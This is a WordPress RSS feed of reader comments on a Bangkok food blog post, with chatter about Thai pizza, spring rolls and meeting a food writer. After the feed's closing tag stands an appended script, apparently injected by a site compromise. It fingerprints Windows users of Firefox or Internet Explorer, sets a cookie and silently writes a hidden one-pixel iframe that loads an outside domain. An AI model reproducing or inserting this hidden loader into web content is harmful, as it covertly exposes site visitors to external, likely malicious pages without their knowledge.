<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Bangkok with Pim</title>
	<atom:link href="http://www.austinbushphotography.com/2006/01/bangkok-with-pim.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/bangkok-with-pim.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Four Seasons Bangkok WGF10: David Kinch - Austin Bush Photography</title>
		<link>http://www.austinbushphotography.com/blog/bangkok-with-pim.html#comment-27330</link>
		<dc:creator>Four Seasons Bangkok WGF10: David Kinch - Austin Bush Photography</dc:creator>
		<pubDate>Thu, 08 Oct 2009 11:11:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2006/01/bangkok-with-pim.html#comment-27330</guid>
		<description>[...] that partially inspire much of his food. Not to mention the fact that, a few years back, I spent a fun afternoon in Bangkok with David&#8217;s longtime Thai partner, Pim, of Chez Pim [...]</description>
		<content:encoded><![CDATA[<p>[...] that partially inspire much of his food. Not to mention the fact that, a few years back, I spent a fun afternoon in Bangkok with David&#8217;s longtime Thai partner, Pim, of Chez Pim [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ECM</title>
		<link>http://www.austinbushphotography.com/blog/bangkok-with-pim.html#comment-121</link>
		<dc:creator>ECM</dc:creator>
		<pubDate>Mon, 10 Apr 2006 07:42:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2006/01/bangkok-with-pim.html#comment-121</guid>
		<description>The Japanese loooove mayo on pizza -- they pile it on, in criss-cross fashion, on top of the pie.  I thought they were the only ones with strange pizza habits ... until I saw your Thai Pizza!</description>
		<content:encoded><![CDATA[<p>The Japanese loooove mayo on pizza &#8212; they pile it on, in criss-cross fashion, on top of the pie.  I thought they were the only ones with strange pizza habits &#8230; until I saw your Thai Pizza!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Let's me share</title>
		<link>http://www.austinbushphotography.com/blog/bangkok-with-pim.html#comment-71</link>
		<dc:creator>Let's me share</dc:creator>
		<pubDate>Tue, 21 Mar 2006 20:09:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2006/01/bangkok-with-pim.html#comment-71</guid>
		<description>I just read your old message to see what others wrote about Thai food. It is good for you to have a chance to go to Tha Phra Chan. Let me share more information. If you want to try deep fried spring roll, there is a shop when you get out of the boat toward Thammasat university. It is sort of on the far right side of &quot;Ran Nong Tha Phra Chan.&quot; It is the best place to eat spring roll. You may ask anyone around there. The spring rool comes in a small piece. The owner were a twin. Just don&#039;t think to much about saniaty in Bangkok. Then, you will be fine.</description>
		<content:encoded><![CDATA[<p>I just read your old message to see what others wrote about Thai food. It is good for you to have a chance to go to Tha Phra Chan. Let me share more information. If you want to try deep fried spring roll, there is a shop when you get out of the boat toward Thammasat university. It is sort of on the far right side of &#8220;Ran Nong Tha Phra Chan.&#8221; It is the best place to eat spring roll. You may ask anyone around there. The spring rool comes in a small piece. The owner were a twin. Just don&#8217;t think to much about saniaty in Bangkok. Then, you will be fine.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Onigiri</title>
		<link>http://www.austinbushphotography.com/blog/bangkok-with-pim.html#comment-51</link>
		<dc:creator>Onigiri</dc:creator>
		<pubDate>Sun, 29 Jan 2006 17:26:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2006/01/bangkok-with-pim.html#comment-51</guid>
		<description>I&#039;m jealous you got to meet Khun Pim! Heh I&#039;ve never been a fan of kao chae. Have fun in Laos and see ya when ya get back. :)</description>
		<content:encoded><![CDATA[<p>I&#8217;m jealous you got to meet Khun Pim! Heh I&#8217;ve never been a fan of kao chae. Have fun in Laos and see ya when ya get back. <img src='http://www.austinbushphotography.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

